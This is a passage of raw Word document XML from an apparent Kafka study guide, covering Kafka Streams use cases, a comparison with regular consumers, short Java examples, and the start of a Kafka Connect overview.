          <w:szCs w:val="22"/>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TL Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams is perfect for building event-driven architectures where multiple services react to events (e.g., user actions, sensor data) and generate new events in response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0995BDE2"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Data Enrichment</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams can enrich real-time data streams by joining streams or performing aggregations to enhance incoming data with additional context or information from other sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A24A1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Processing and Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is often used for real-time data aggregation, such as counting items or calculating the sum of values over a sliding time window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0116AA"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Streams Differs from Regular Kafka Consumers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF6E7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built for stream processing, </w:t>
      </w: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4663"/>
        <w:gridCol w:w="3586"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="3FEE60AC" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09CCDA7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12E5D2E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15D8F9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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="332CC5D0" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36FF7AA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2104BA8"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 processing library for real-time transformations and aggregations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="463325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d to consume messages from Kafka topics without stream processing features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="55DC294F" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57AD9E6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AA3514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both stateful (e.g., joins, aggregations) and stateless processing. Maintains state in local stores for stateful operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2670F10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are stateless and do not manage internal state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2EA77380" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A298E4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2743CD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erform complex operations like filtering, mapping, joining, aggregating, and windowing on streams.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F29B8E7"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used for basic message consumption and processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6AF4C517" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6906B97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4205B40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offer automatic recovery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="7C6034E2" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B39EDF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086B7BF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manual scaling and partitioning to distribute workloads across multiple consumers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="24BDCF70" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11D9C5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6A75D6B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for processing, ensuring that each message is processed exactly once, even in the case of failures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45BAA7A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need to manually handle offset management to ensure messages are not lost or duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2E45E1A7" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20CBD08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Stores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="460AD6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any local state; they rely on Kafka's offsets for tracking consumption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2EF318A2" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EE953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Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60DE44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abstracts much of the complexity around message consumption, offset </w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>management, fault tolerance, and recovery, making it easier to build real-time applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49ED481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Developers need to handle most aspects of message consumption, </w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>fault tolerance, and offset management themselves.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="14523C9C" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F04D1D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 Topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F43BB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tightly integrated with Kafka and handles both consuming and producing messages within a single framework.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A4B8C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only consume messages from Kafka topics and don’t handle producing data unless explicitly coded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31EBDFA0"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Streams Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEC46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a Kafka Streams application that reads messages from a Kafka topic, transforms the messages to uppercase, and writes them to another topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0B3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afkaStreams;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07221AE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StreamsBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426FB42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stream.KStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525E8BD7" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10278AE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5807900F" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352E83B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KafkaStreamsExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480BFE7" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4EDD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6E8FB19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Set up the properties for Kafka Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199E035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5DF4087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application.id", "streams-example");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F666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08DA1856" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E44A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Define the stream processing logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11818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Builder builder = new StreamsBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A1DD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inputStream = builder.stream("input-topic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB19A3E" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44772C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form the input stream to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B05D8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transformedStream = inputStream.mapValues(value -&gt; value.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4E8FBF" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ED5A8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Write the transformed data to another topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B75D4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ransformedStream.to("output-topic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7381BA37" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D1B8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Build the Kafka Streams topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B154E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Streams streams = new KafkaStreams(builder.build(), props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78135A8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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19854F8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A49B1F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83CE6C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D89C1"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input-topic is consumed by the Kafka Streams application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A6C76"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messages are transformed (in this case, converted to uppercase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F98F2"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cessed messages are then written to output-topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330B70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utomatically handles the consumption of messages, transformation, fault tolerance, state management (if required), and producing the results back to Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F90FFD"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Regular Kafka Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7447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 simple example of a regular Kafka consumer that consumes messages from a Kafka topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A3DC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Consumer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795FFB9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KafkaConsumer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244A27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ommon.serialization.StringDeserializer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E19360C" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383B589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Collections;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C2070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4994422D" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BB9FB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RegularKafkaConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC55B3" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA0A2C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29914B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46003D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124AD9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group.id", "test-consumer-group");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C872AE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key.deserializer", StringDeserializer.class.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48853E6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value.deserializer", StringDeserializer.class.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8AE05" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F8C82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lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3823BEA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subscribe(Collections.singletonList("input-topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5542B7" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37ED359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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E4DF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poll(1000).forEach(record -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657170E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4C04C03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D4E81E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7D9594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8439A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4810A1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regular consumer example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C54AA"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reads messages from input-topic and prints them to the console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8EED4"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t doesn't perform any transformations or advanced stream processing like Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EEF229" w14:textId="77777777" w:rsidR="00C34B0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0FF85">
          <v:rect id="_x0000_i3410" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD031C"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FD1885"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library designed for stream processing with features like stateful processing, fault tolerance, scalability, and exactly-once semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA28DDE"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basic consumption of messages without the rich features of stream processing, state management, or windowing offered by Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A29588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411" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE9BA2" w14:textId="495A9F18" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00391147" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="849" w:name="_Toc197868063"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Kafka Connect framework, and how does it help in data integration</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="849"/>
    </w:p>
    <w:p w14:paraId="510A5E6C" w14:textId="486F65AE" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED"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Framework: Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5282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tool for </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable and reliable</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> streaming data integration. It is a part of the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ecosystem designed to simplify the process of integrating </w:t>
      </w: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with external systems, such as </w:t>
      </w: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key-value stor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earch index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ynchronizing data between Kafka topics and external systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D73497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implifies data import and export between </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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mponents of Kafka Connect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A2C51"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62FC44"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These pull data from external systems into Kafka. For example, a database source connector can fetch records from a database and produce them into Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F747233"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These push data from Kafka topics into external systems. For example, a database sink connector can read data from Kafka topics and insert it into a relational database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E02E4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1C21E"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uses </w:t>
      </w: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xml:space="preserve"> to run connectors. Workers can run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where a single worker runs on one machin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where multiple workers run across multiple machines in a Kafka cluster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7210B1D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Suitable for simple, low-volume data transfer tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0583871C"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Suitable for large-scale, high-availability setups where multiple instances of connectors can be run across several machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E2F658"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 Configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B115826"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configurations can be loaded into Kafka Connect via REST API calls or configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67176E40"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Connect Helps in Data Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ED804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lining Data Movement</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5E839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bstracts the complexities of manually handling Kafka producers and consumers when integrating with external systems. It provides connectors for common systems such as databases, cloud services, file systems, etc., enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>plug-and-play</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA7432"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le and Fault Tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
